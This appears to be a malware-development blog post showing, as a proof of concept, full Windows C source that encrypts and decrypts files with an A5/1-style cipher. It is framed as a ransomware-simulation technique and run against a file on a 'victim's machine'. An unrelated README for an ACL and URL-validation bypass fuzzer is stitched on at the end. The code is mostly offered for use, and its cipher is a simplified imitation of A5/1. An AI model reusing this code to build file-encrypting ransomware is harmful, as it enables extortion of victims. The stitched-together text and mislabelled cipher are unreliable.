voidencrypt_file(constchar*inputFile,constchar*outputFile,constchar*key){HANDLEifh=CreateFileA(inputFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);HANDLEofh=CreateFileA(outputFile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(ifh==INVALID_HANDLE_VALUE||ofh==INVALID_HANDLE_VALUE){printf("error opening file.\n");return;}LARGE_INTEGERfileSize;GetFileSizeEx(ifh,&fileSize);unsignedchar*fileData=(unsignedchar*)malloc(fileSize.LowPart);DWORDbytesRead;ReadFile(ifh,fileData,fileSize.LowPart,&bytesRead,NULL);unsignedcharkeyData[A51_KEY_SIZE];memcpy(keyData,key,A51_KEY_SIZE);// calculate the padding sizesize_tpaddingSize=(A51_BLOCK_SIZE-(fileSize.LowPart%A51_BLOCK_SIZE))%A51_BLOCK_SIZE;// pad the file datasize_tpaddedSize=fileSize.LowPart+paddingSize;unsignedchar*paddedData=(unsignedchar*)malloc(paddedSize);memcpy(paddedData,fileData,fileSize.LowPart);memset(paddedData+fileSize.LowPart,static_cast<char>(paddingSize),paddingSize);// encrypt the padded datafor(size_ti=0;i<paddedSize;i+=A51_BLOCK_SIZE){a5_1_encrypt(keyData,A51_KEY_SIZE,paddedData+i,A51_BLOCK_SIZE,paddedData+i);}// write the encrypted data to the output fileDWORDbw;WriteFile(ofh,paddedData,paddedSize,&bw,NULL);printf("a5/1 encryption successful\n");CloseHandle(ifh);CloseHandle(ofh);free(fileData);free(paddedData);}voiddecrypt_file(constchar*inputFile,constchar*outputFile,constchar*key){HANDLEifh=CreateFileA(inputFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);HANDLEofh=CreateFileA(outputFile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(ifh==INVALID_HANDLE_VALUE||ofh==INVALID_HANDLE_VALUE){printf("error opening file.\n");return;}LARGE_INTEGERfileSize;GetFileSizeEx(ifh,&fileSize);unsignedchar*fileData=(unsignedchar*)malloc(fileSize.LowPart);DWORDbytesRead;ReadFile(ifh,fileData,fileSize.LowPart,&bytesRead,NULL);unsignedcharkeyData[A51_KEY_SIZE];memcpy(keyData,key,A51_KEY_SIZE);// decrypt the file data using A5/1 encryptionfor(DWORDi=0;i<fileSize.LowPart;i+=A51_BLOCK_SIZE){a5_1_decrypt(keyData,A51_KEY_SIZE,fileData+i,A51_BLOCK_SIZE,fileData+i);}// calculate the padding sizesize_tpaddingSize=fileData[fileSize.LowPart-1];// validate and remove paddingif(paddingSize<=A51_BLOCK_SIZE&&paddingSize>0){size_toriginalSize=fileSize.LowPart-paddingSize;unsignedchar*originalData=(unsignedchar*)malloc(originalSize);memcpy(originalData,fileData,originalSize);// write the decrypted data to the output fileDWORDbw;WriteFile(ofh,originalData,originalSize,&bw,NULL);printf("a5/1 decryption successful\n");CloseHandle(ifh);CloseHandle(ofh);free(fileData);free(originalData);}else{// invalid padding size, print an error message or handle it accordinglyprintf("invalid padding size: %d\n",paddingSize);CloseHandle(ifh);CloseHandle(ofh);free(fileData);}}
As you can see, it operates on the data in blocks of A51_BLOCK_SIZE (8) bytes and in case when file size is not a multiple of 8, just add padding logic for encrypted and decrypted data:
voidadd_padding(HANDLEfh){LARGE_INTEGERfs;GetFileSizeEx(fh,&fs);size_tpaddingS=A51_BLOCK_SIZE-(fs.QuadPart%A51_BLOCK_SIZE);if(paddingS!=A51_BLOCK_SIZE){SetFilePointer(fh,0,NULL,FILE_END);for(size_ti=0;i<paddingS;++i){charpaddingB=static_cast<char>(paddingS);WriteFile(fh,&paddingB,1,NULL,NULL);}}}voidremove_padding(HANDLEfileHandle){LARGE_INTEGERfileSize;GetFileSizeEx(fileHandle,&fileSize);// determine the padding sizeDWORDpaddingSize;SetFilePointer(fileHandle,-1,NULL,FILE_END);ReadFile(fileHandle,&paddingSize,1,NULL,NULL);// validate and remove paddingif(paddingSize<=A51_BLOCK_SIZE&&paddingSize>0){// seek back to the beginning of the paddingSetFilePointer(fileHandle,-paddingSize,NULL,FILE_END);// read and validate the entire paddingBYTE*padding=(BYTE*)malloc(paddingSize);DWORDbytesRead;if(ReadFile(fileHandle,padding,paddingSize,&bytesRead,NULL)&&bytesRead==paddingSize){// check if the padding bytes are validfor(size_ti=0;i<paddingSize;++i){if(padding[i]!=static_cast<char>(paddingSize)){// invalid padding, print an error message or handle it accordinglyprintf("invalid padding found in the file.\n");free(padding);return;}}// truncate the file at the position of the last complete blockSetEndOfFile(fileHandle);}else{// error reading the padding bytes, print an error message or handle it accordinglyprintf("error reading padding bytes from the file.\n");}free(padding);}else{// invalid padding size, print an error message or handle it accordinglyprintf("invalid padding size: %d\n",paddingSize);}}
The full source code is looks like this hack.c:
/*
* hack.c
* encrypt/decrypt file via GSM A5/1 algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/05/12/malware-cryptography-27.html
*/#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>#define ROL(x, y) (((x) << (y)) | ((x) >> (32 - (y))))
#define A5_STEP(x, y, z) ((x & y) ^ (x & z) ^ (y & z))
#define A51_BLOCK_SIZE 8
#define A51_KEY_SIZE 8
voida5_1_encrypt(unsignedchar*key,intkey_len,unsignedchar*msg,intmsg_len,unsignedchar*out){// initializationunsignedintR1=0,R2=0,R3=0;for(inti=0;i<64;i++){intfeedback=((key[i%key_len]>>(i/8))&1)^((R1>>18)&1)^((R2>>21)&1)^((R3>>22)&1);R1=(R1<<1)|feedback;R2=(R2<<1)|((R1>>8)&1);R3=(R3<<1)|((R2>>10)&1);}// encryptionfor(inti=0;i<msg_len;i++){intfeedback=A5_STEP((R1>>8)&1,(R2>>10)&1,(R3>>10)&1);unsignedcharkey_byte=0;for(intj=0;j<8;j++){intbit=A5_STEP((R1>>18)&1,(R2>>21)&1,(R3>>22)&1)^feedback;key_byte|=bit<<j;R1=(R1<<1)|bit;R2=(R2<<1)|((R1>>8)&1);R3=(R3<<1)|((R2>>10)&1);}out[i]=msg[i]^key_byte;}}voida5_1_decrypt(unsignedchar*key,intkey_len,unsignedchar*cipher,intcipher_len,unsignedchar*out){// initializationunsignedintR1=0,R2=0,R3=0;for(inti=0;i<64;i++){intfeedback=((key[i%key_len]>>(i/8))&1)^((R1>>18)&1)^((R2>>21)&1)^((R3>>22)&1);R1=(R1<<1)|feedback;R2=(R2<<1)|((R1>>8)&1);R3=(R3<<1)|((R2>>10)&1);}// decryptionfor(inti=0;i<cipher_len;i++){intfeedback=A5_STEP((R1>>8)&1,(R2>>10)&1,(R3>>10)&1);unsignedcharkey_byte=0;for(intj=0;j<8;j++){intbit=A5_STEP((R1>>18)&1,(R2>>21)&1,(R3>>22)&1)^feedback;key_byte|=bit<<j;R1=(R1<<1)|bit;R2=(R2<<1)|((R1>>8)&1);R3=(R3<<1)|((R2>>10)&1);}out[i]=cipher[i]^key_byte;}}voidadd_padding(HANDLEfh){LARGE_INTEGERfs;GetFileSizeEx(fh,&fs);size_tpaddingS=A51_BLOCK_SIZE-(fs.QuadPart%A51_BLOCK_SIZE);if(paddingS!=A51_BLOCK_SIZE){SetFilePointer(fh,0,NULL,FILE_END);for(size_ti=0;i<paddingS;++i){charpaddingB=static_cast<char>(paddingS);WriteFile(fh,&paddingB,1,NULL,NULL);}}}voidremove_padding(HANDLEfileHandle){LARGE_INTEGERfileSize;GetFileSizeEx(fileHandle,&fileSize);// determine the padding sizeDWORDpaddingSize;SetFilePointer(fileHandle,-1,NULL,FILE_END);ReadFile(fileHandle,&paddingSize,1,NULL,NULL);// validate and remove paddingif(paddingSize<=A51_BLOCK_SIZE&&paddingSize>0){// seek back to the beginning of the paddingSetFilePointer(fileHandle,-paddingSize,NULL,FILE_END);// read and validate the entire paddingBYTE*padding=(BYTE*)malloc(paddingSize);DWORDbytesRead;if(ReadFile(fileHandle,padding,paddingSize,&bytesRead,NULL)&&bytesRead==paddingSize){// check if the padding bytes are validfor(size_ti=0;i<paddingSize;++i){if(padding[i]!=static_cast<char>(paddingSize)){// invalid padding, print an error message or handle it accordinglyprintf("invalid padding found in the file.\n");free(padding);return;}}// truncate the file at the position of the last complete blockSetEndOfFile(fileHandle);}else{// error reading the padding bytes, print an error message or handle it accordinglyprintf("error reading padding bytes from the file.\n");}free(padding);}else{// invalid padding size, print an error message or handle it accordinglyprintf("invalid padding size: %d\n",paddingSize);}}voidencrypt_file(constchar*inputFile,constchar*outputFile,constchar*key){HANDLEifh=CreateFileA(inputFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);HANDLEofh=CreateFileA(outputFile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(ifh==INVALID_HANDLE_VALUE||ofh==INVALID_HANDLE_VALUE){printf("error opening file.\n");return;}LARGE_INTEGERfileSize;GetFileSizeEx(ifh,&fileSize);unsignedchar*fileData=(unsignedchar*)malloc(fileSize.LowPart);DWORDbytesRead;ReadFile(ifh,fileData,fileSize.LowPart,&bytesRead,NULL);unsignedcharkeyData[A51_KEY_SIZE];memcpy(keyData,key,A51_KEY_SIZE);// calculate the padding sizesize_tpaddingSize=(A51_BLOCK_SIZE-(fileSize.LowPart%A51_BLOCK_SIZE))%A51_BLOCK_SIZE;// pad the file datasize_tpaddedSize=fileSize.LowPart+paddingSize;unsignedchar*paddedData=(unsignedchar*)malloc(paddedSize);memcpy(paddedData,fileData,fileSize.LowPart);memset(paddedData+fileSize.LowPart,static_cast<char>(paddingSize),paddingSize);// encrypt the padded datafor(size_ti=0;i<paddedSize;i+=A51_BLOCK_SIZE){a5_1_encrypt(keyData,A51_KEY_SIZE,paddedData+i,A51_BLOCK_SIZE,paddedData+i);}// write the encrypted data to the output fileDWORDbw;WriteFile(ofh,paddedData,paddedSize,&bw,NULL);printf("a5/1 encryption successful\n");CloseHandle(ifh);CloseHandle(ofh);free(fileData);free(paddedData);}voiddecrypt_file(constchar*inputFile,constchar*outputFile,constchar*key){HANDLEifh=CreateFileA(inputFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);HANDLEofh=CreateFileA(outputFile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(ifh==INVALID_HANDLE_VALUE||ofh==INVALID_HANDLE_VALUE){printf("error opening file.\n");return;}LARGE_INTEGERfileSize;GetFileSizeEx(ifh,&fileSize);unsignedchar*fileData=(unsignedchar*)malloc(fileSize.LowPart);DWORDbytesRead;ReadFile(ifh,fileData,fileSize.LowPart,&bytesRead,NULL);unsignedcharkeyData[A51_KEY_SIZE];memcpy(keyData,key,A51_KEY_SIZE);// decrypt the file data using A5/1 encryptionfor(DWORDi=0;i<fileSize.LowPart;i+=A51_BLOCK_SIZE){a5_1_decrypt(keyData,A51_KEY_SIZE,fileData+i,A51_BLOCK_SIZE,fileData+i);}// calculate the padding sizesize_tpaddingSize=fileData[fileSize.LowPart-1];// validate and remove paddingif(paddingSize<=A51_BLOCK_SIZE&&paddingSize>0){size_toriginalSize=fileSize.LowPart-paddingSize;unsignedchar*originalData=(unsignedchar*)malloc(originalSize);memcpy(originalData,fileData,originalSize);// write the decrypted data to the output fileDWORDbw;WriteFile(ofh,originalData,originalSize,&bw,NULL);printf("a5/1 decryption successful\n");CloseHandle(ifh);CloseHandle(ofh);free(fileData);free(originalData);}else{// invalid padding size, print an error message or handle it accordinglyprintf("invalid padding size: %d\n",paddingSize);CloseHandle(ifh);CloseHandle(ofh);free(fileData);}}intmain(){constchar*inputFile="Z:\\test.txt";constchar*outputFile="Z:\\test.txt.a51";constchar*decryptedFile="Z:\\test.txt.a51.decrypted";constchar*key="\x6d\x65\x6f\x77\x6d\x65\x6f\x77";encrypt_file(inputFile,outputFile,key);decrypt_file(outputFile,decryptedFile,key);return0;}
As you can see, as usual, for test I just encrypt file test.txt and decrypt it.
cat test.txt
demo
Letβs see everything in action, compile our PoC code:
and letβs say we have a test.txt file in the Z:\\ path on the victimβs machine:
hexdump -C test.txt
Then just run our application on Windows 11 x64 machine:
.\hack.exe
Letβs check a decrypted and original files, for example via hexdump command:
hexdump -C test.txt.a51.decrypted
As you can see our simple PoC is worked perfectly.
I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal and useful for adversary (ransomware) sumulation purposes.
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
Follow me on twitter! @intrudir
Usage
usage: bypassfuzzer.py -h
Specifying a request to test
Best method: Feed it a raw HTTP request from Burp!
Simply paste the request into a file and run the script! - It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests
Login
